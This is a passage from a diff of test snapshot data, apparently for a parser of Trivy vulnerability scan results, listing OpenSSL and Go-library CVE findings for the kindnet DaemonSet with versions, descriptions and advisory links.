-not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://security.gentoo.org/glsa/202210-42", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://support.apple.com/kb/HT213255", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://support.apple.com/kb/HT213256", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://support.apple.com/kb/HT213257", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://ubuntu.com/security/notices/USN-5355-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2097", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2097", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", - "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", - "https://linux.oracle.com/cve/CVE-2022-2097.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", - "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220715-0011/", - "https://security.netapp.com/advisory/ntap-20230420-0008/", - "https://ubuntu.com/security/notices/USN-5502-1", - "https://www.cve.org/CVERecord?id=CVE-2022-2097", - "https://www.debian.org/security/2023/dsa-5343", - "https://www.openssl.org/news/secadv/20220705.txt", - ], - }, - "category": "Vulnerability", - "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "AES OCB fails to encrypt some bytes", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2097", + "value": "https://ubuntu.com/security/notices/USN-5355-2", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", + "value": "https://ubuntu.com/security/notices/USN-5359-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2097", + "value": "https://ubuntu.com/security/notices/USN-5359-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", + "value": "https://ubuntu.com/security/notices/USN-5739-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", + "value": "https://www.debian.org/security/2022/dsa-5111", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", + "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.3.2", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-3121", + "installedVersion": "v1.3.1", + "packageName": "github.com/gogo/protobuf", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-3121", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", + "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", + "https://github.com/advisories/GHSA-c3h9-896r-86jm", + "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", + "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", + "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", + "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", + "https://pkg.go.dev/vuln/GO-2021-0053", + "https://security.netapp.com/advisory/ntap-20210219-0006/", + "https://www.cve.org/CVERecord?id=CVE-2021-3121", + ], + }, + "category": "Vulnerability", + "description": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the "skippy peanut butter" issue.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://avd.aquasec.com/nvd/cve-2021-3121", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://access.redhat.com/security/cve/CVE-2021-3121", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://github.com/advisories/GHSA-c3h9-896r-86jm", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "value": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "value": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", + "value": "https://pkg.go.dev/vuln/GO-2021-0053", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://security.netapp.com/advisory/ntap-20210219-0006/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3121", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20201216223049-8b5274cf687f", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-29652", + "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", + "packageName": "golang.org/x/crypto", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-29652", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652", + "https://errata.almalinux.org/8/ALSA-2021-1796.html", + "https://github.com/advisories/GHSA-3vm4-22fp-5rfm", + "https://go-review.googlesource.com/c/crypto/+/278852", + "https://go.dev/cl/278852", + "https://go.googlesource.com/crypto/+/8b5274cf687fd9316b4108863654cc57385531e8", + "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1", + "https://linux.oracle.com/cve/CVE-2020-29652.html", + "https://linux.oracle.com/errata/ELSA-2021-1796.html", + "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2020-29652", + "https://pkg.go.dev/vuln/GO-2021-0227", + "https://www.cve.org/CVERecord?id=CVE-2020-29652", + ], + }, + "category": "Vulnerability", + "description": "A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.0-20201203163018-be400aefbc4c for Go allows remote attackers to cause a denial of service against SSH servers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "value": "https://avd.aquasec.com/nvd/cve-2020-29652", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "value": "https://access.redhat.com/security/cve/CVE-2020-29652", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "value": "https://errata.almalinux.org/8/ALSA-2021-1796.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "value": "https://github.com/advisories/GHSA-3vm4-22fp-5rfm", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://go-review.googlesource.com/c/crypto/+/278852", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", + "value": "https://go.dev/cl/278852", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", + "value": "https://go.googlesource.com/crypto/+/8b5274cf687fd9316b4108863654cc57385531e8", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5502-1", + "value": "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "value": "https://linux.oracle.com/cve/CVE-2020-29652.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5343", + "value": "https://linux.oracle.com/errata/ELSA-2021-1796.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220705.txt", + "value": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2021-0227", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-29652", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4304", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20211202192323-5770296d904e", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-43565", + "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", + "packageName": "golang.org/x/crypto", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4304", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", - "https://linux.oracle.com/cve/CVE-2022-4304.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", - "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4304", - "https://www.openssl.org/news/secadv/20230207.txt", + "https://access.redhat.com/security/cve/CVE-2021-43565", + "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", + "https://go.dev/cl/368814/", + "https://go.dev/issues/49932", + "https://groups.google.com/forum/#!forum/golang-announce", + "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", + "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", + "https://pkg.go.dev/vuln/GO-2022-0968", + "https://www.cve.org/CVERecord?id=CVE-2021-43565", ], }, "category": "Vulnerability", - "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", + "description": "The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "timing attack in RSA Decryption implementation", + "name": "golang.org/x/crypto: empty plaintext packet causes panic", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4304", + "value": "https://avd.aquasec.com/nvd/cve-2021-43565", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "https://access.redhat.com/security/cve/CVE-2021-43565", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4304", + "value": "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://go.dev/cl/368814/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://go.dev/issues/49932", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://groups.google.com/forum/#!forum/golang-announce", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://pkg.go.dev/vuln/GO-2022-0968", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-43565", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27191", + "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", + "packageName": "golang.org/x/crypto", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8008", + "https://access.redhat.com/security/cve/CVE-2022-27191", + "https://bugzilla.redhat.com/1939485", + "https://bugzilla.redhat.com/1989564", + "https://bugzilla.redhat.com/1989570", + "https://bugzilla.redhat.com/1989575", + "https://bugzilla.redhat.com/2064702", + "https://bugzilla.redhat.com/2121445", + "https://bugzilla.redhat.com/2121453", + "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "https://go.dev/cl/392355", + "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "https://linux.oracle.com/cve/CVE-2022-27191.html", + "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "https://pkg.go.dev/vuln/GO-2021-0356", + "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "https://security.netapp.com/advisory/ntap-20220429-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-27191", + ], + }, + "category": "Vulnerability", + "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "crash in a golang.org/x/crypto/ssh server", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://avd.aquasec.com/nvd/cve-2022-27191", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://access.redhat.com/errata/RHSA-2022:8008", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://access.redhat.com/security/cve/CVE-2022-27191", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://bugzilla.redhat.com/1939485", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://bugzilla.redhat.com/1989564", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://bugzilla.redhat.com/1989570", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://bugzilla.redhat.com/1989575", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://bugzilla.redhat.com/2064702", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://bugzilla.redhat.com/2121445", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://bugzilla.redhat.com/2121453", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://go.dev/cl/392355", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": 